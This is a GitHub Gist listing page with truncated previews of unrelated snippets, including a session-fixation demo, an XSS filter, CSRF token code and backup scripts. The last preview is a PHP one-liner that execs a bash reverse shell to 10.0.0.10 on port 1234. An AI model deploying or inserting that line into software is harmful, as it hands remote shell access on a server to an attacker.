start new:
tmux
start new with session name:
tmux new -s myname
markjames
/ Session Fixation Example.php
Created
August 10, 2010 09:23
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| // Demo for session fixation | |
| // | |
| // Attacker creates a session by visiting the page: http://famfamfam.com/sessionfixation.php | |
| // Attacker gets their session ID out of the cookie (or in this case from the page) | |
| // Attacker creates a URL such as http://famfamfam.com/sessionfixation.php?PHPSESSID=attackerssessionid and sends it to victim | |
| // Victim clicks the URL (now both the attacker and victim are using the same session) | |
| // Victim logs in | |
| // Now the attacker is logged in to the victim's account too (same session!) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Shell script to backup MySQL database | |
| # Set these variables | |
| MyUSER="" # DB_USERNAME | |
| MyPASS="" # DB_PASSWORD | |
| MyHOST="" # DB_HOSTNAME | |
| # Backup Dest directory | |
| DEST="" # /home/username/backups/DB |
mbijon
/ xss_clean.php
Last active
November 1, 2022 03:23
XSS filtering in PHP (cleans various UTF encodings & nested exploits)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /* | |
| * XSS filter, recursively handles HTML tags & UTF encoding | |
| * Optionally handles base64 encoding | |
| * | |
| * ***DEPRECATION RECOMMENDED*** Not updated or maintained since 2011 | |
| * A MAINTAINED & BETTER ALTERNATIVE => kses | |
| * https://github.com/RichardVasquez/kses/ | |
| * | |
| * This was built from numerous sources |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - */ | |
| /* AES implementation in JavaScript (c) Chris Veness 2005-2011 */ | |
| /* - see http://csrc.nist.gov/publications/PubsFIPS.html#197 */ | |
| /* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - */ | |
| var Aes = {}; // Aes namespace | |
| /** | |
| * AES Cipher function: encrypt 'input' state with Rijndael algorithm | |
| * applies Nr rounds (10/12/14) using key schedule w for 'add round key' stage |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| if [ "root" != "$(whoami)" ]; then | |
| echo "You must run this command as root" 1>&2 | |
| exit 1 | |
| fi | |
| set -x | |
| # Download and extract | |
| if [ ! -z "${1}" ]; then |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| // See: http://blog.ircmaxell.com/2013/02/preventing-csrf-attacks.html | |
| // Start a session (which should use cookies over HTTP only). | |
| session_start(); | |
| // Create a new CSRF token. | |
| if (! isset($_SESSION['csrf_token'])) { | |
| $_SESSION['csrf_token'] = base64_encode(openssl_random_pseudo_bytes(32)); | |
| } |
saxman
/ MainActivity.java
Created
April 9, 2013 16:31
Plotting markers on a map in Android using data from a JSON web service and the Google Maps Android API v2
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * Copyright (c) 2013 Google Inc. | |
| * | |
| * Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except | |
| * in compliance with the License. You may obtain a copy of the License at | |
| * | |
| * http://www.apache.org/licenses/LICENSE-2.0 | |
| * | |
| * Unless required by applicable law or agreed to in writing, software distributed under the License | |
| * is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express |
jasonrudolph
/ 00-about-search-api-examples.md
Last active
April 30, 2024 19:21
5 entertaining things you can find with the GitHub Search API
Let's have some command-line fun with curl, [jq][1], and the [new GitHub Search API][2].
Today we're looking for:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"); |
OlderNewer